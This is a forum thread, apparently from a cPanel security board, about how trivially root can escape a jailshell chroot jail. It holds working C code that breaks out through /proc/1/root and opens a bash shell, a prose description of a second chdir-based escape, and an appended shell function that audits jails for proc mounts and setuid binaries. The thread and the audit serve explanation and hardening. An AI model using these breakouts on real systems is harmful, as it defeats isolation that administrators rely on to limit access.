jailshell: get out of jail free

Discussion in 'Security' started by tylerl, Nov 4, 2010.

  1. tylerl

    tylerl Active Member

    This isn't new, nor is it news.

    I recently needed to give jailshell'ed users access to specific root functionality outside the chroot jail on a specific server. The mechanism for breaking out of jail is so trivial that I figured I'd post it here for two reasons.

    First, if you need to be able to grant out-of-jail access on specific setuid-root binaries for jailshell users, here's the solution. And second, if you're considering using jailshell for security reasons, you ought to know how very little protection it actually offers. Also, it's worth pointing out again, there's little sense in creating a chroot jail if you're going to mount proc inside it (therefore providing a route back out).

    The following code, if run as root or as a setuid-root binary, will spawn a regular bash shell outside the jail environment.

    Code:
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    
    int main(int argc, char* argv[])
    {
    	// clear UID restrictions
    	setreuid(0,0);
    	setregid(0,0);
    	
    	// jailbreak
    	chroot("/proc/1/root");
    
    	// exec bash
    	char **argv_out = malloc(sizeof(char*)*2);
    	argv_out[0] = "/bin/bash";
    	argv_out[1] = 0;
    	execvp(argv_out[0], argv_out);
    
    	// fail
    	perror("Unable to execute command");
    	return 1;
    }
    
     
  2. cPanelKenneth

    cPanelKenneth cPanel Development
    Staff Member

    A chroot jail is not a security mechanism.

    If you grant someone root capabilities, don't be surprised when they use the privileges in an unintended way.
     
  3. JeffP.

    JeffP. Well-Known Member

    Additionally, /proc access isn't required. If you get root in a jailed env, you can just chroot somedir, then chdir .. a few times, chroot ., and exec a shell from there. There are protections against this type of thing, but I just wanted to note that /proc isn't really the deciding factor in breaking out of a jailed env or not.
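
Added example, not part of any post in this thread and not cPanel's code: a shell function an administrator could run to audit a jail directory for the two conditions discussed above, a proc filesystem mounted inside the jail and setuid binaries present in it. The function name `jail_audit`, its output tags and its arguments are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a chroot jail tree for the two conditions raised in
# this thread. The jail path and mounts file are supplied by the caller.
#
# jail_audit JAIL [MOUNTS_FILE]   (MOUNTS_FILE defaults to /proc/mounts)
# Prints one finding per line and returns 1 if there is any finding:
#   PROC_MOUNTED <mountpoint>   proc filesystem mounted at or below JAIL
#   SETUID_ROOT <path>          setuid file owned by uid 0 below JAIL
#   SETUID_OTHER <path>         setuid file owned by any other uid
jail_audit() {
    jail=${1%/}                 # drop one trailing slash; "/" becomes ""
    mounts=${2:-/proc/mounts}
    findings=0

    # Mount table fields: device mountpoint fstype options dump pass
    while read -r _dev mnt fstype _rest; do
        [ "$fstype" = "proc" ] || continue
        case "$mnt" in
            "$jail"|"$jail"/*)
                printf 'PROC_MOUNTED %s\n' "$mnt"
                findings=1 ;;
        esac
    done < "$mounts"

    # Setuid files below the jail. Root-owned ones run with uid 0 for
    # whoever executes them, which is the precondition both posts rely on.
    suid_root=$(find "${jail:-/}" -type f -perm -4000 -user 0 2>/dev/null || :)
    suid_other=$(find "${jail:-/}" -type f -perm -4000 ! -user 0 2>/dev/null || :)
    if [ -n "$suid_root" ]; then
        printf '%s\n' "$suid_root" | sed 's/^/SETUID_ROOT /'
        findings=1
    fi
    if [ -n "$suid_other" ]; then
        printf '%s\n' "$suid_other" | sed 's/^/SETUID_OTHER /'
        findings=1
    fi
    return "$findings"
}
```

Every `SETUID_ROOT` line is a binary to review by hand, since the thread's point is that root inside the jail is not contained by it.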
     